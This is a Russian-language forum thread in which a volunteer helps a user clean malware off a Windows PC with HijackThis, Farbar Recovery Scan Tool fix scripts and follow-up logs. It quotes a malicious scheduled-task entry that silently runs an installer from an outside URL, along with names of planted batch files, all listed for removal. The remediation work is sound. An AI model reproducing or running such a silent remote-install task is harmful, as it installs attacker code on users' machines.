[решено] BSOD, изменение настроек Firefox, командная строка логов загрузки файла, вирус-ссылки

JamesD · Отправлено: **23:23, 06-01-2018** | #2

Перед выложенным (последним) логом я как раз проделал sfc /scannow и прошелся adwcleaner.
Так же установил Panda Antivirus, тот кого-то словил.

Сейчас вроде бы больше BSOD, зависаний и открытий ссылок нет. Если что - могу выложить логи на пару часов ранее, перед adwcleaner. Но судя по тому, что поздние логи скачивали, но ничего не ответили - вирусы удалены полностью?

Sandor · Отправлено: **10:38, 08-01-2018** | #3

Здравствуйте!

Пофиксите в HijackThis следующие строчки:

Код:

O22 - Task: sXby - C:\Program Files (x86)\Common Files\eZaOowVuCa.exe /i http://soflourd.com/nhgmlhnqissw.vzm /q

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

JamesD · Отправлено: **03:34, 12-01-2018** | #4

Благодарю!
Логи прикрепил

Sandor · Отправлено: **09:58, 12-01-2018** | #5

Отключите до перезагрузки антивирус.

Выделите следующий код:

Код:

Start::
CreateRestorePoint:
GroupPolicyScripts-x32: Restriction <==== ATTENTION
2009-07-14 03:14 - 2009-07-14 03:14 - 000000072 _____ () C:\Users\Каролина\SYQjoRau.bat
2009-07-14 03:14 - 2009-07-14 03:14 - 000001187 _____ () C:\Program Files (x86)\Common Files\zRCOXM.bat
2017-12-14 19:14 - 2017-12-14 19:14 - 000000000 ____H () C:\Users\Каролина\AppData\Local\BIT8713.tmp
Hosts:
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

JamesD · CollectionLog-2018.01.12-20.42.zip

Отправил.
Заодно заново скачал autologger и провел сканирование.

Sandor · Отправлено: **10:25, 15-01-2018** | #7

Проблема устранена?

JamesD · Отправлено: **18:11, 16-01-2018** | #8

Ну, состояние исправилось еще до скриптов удаления вирусов и их bat файлов.

Надеюсь, вирусов больше не осталось, спасибо!

Sandor · Отправлено: **09:23, 17-01-2018** | #9

Проверьте уязвимые места:

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
Прикрепите этот файл к своему следующему сообщению.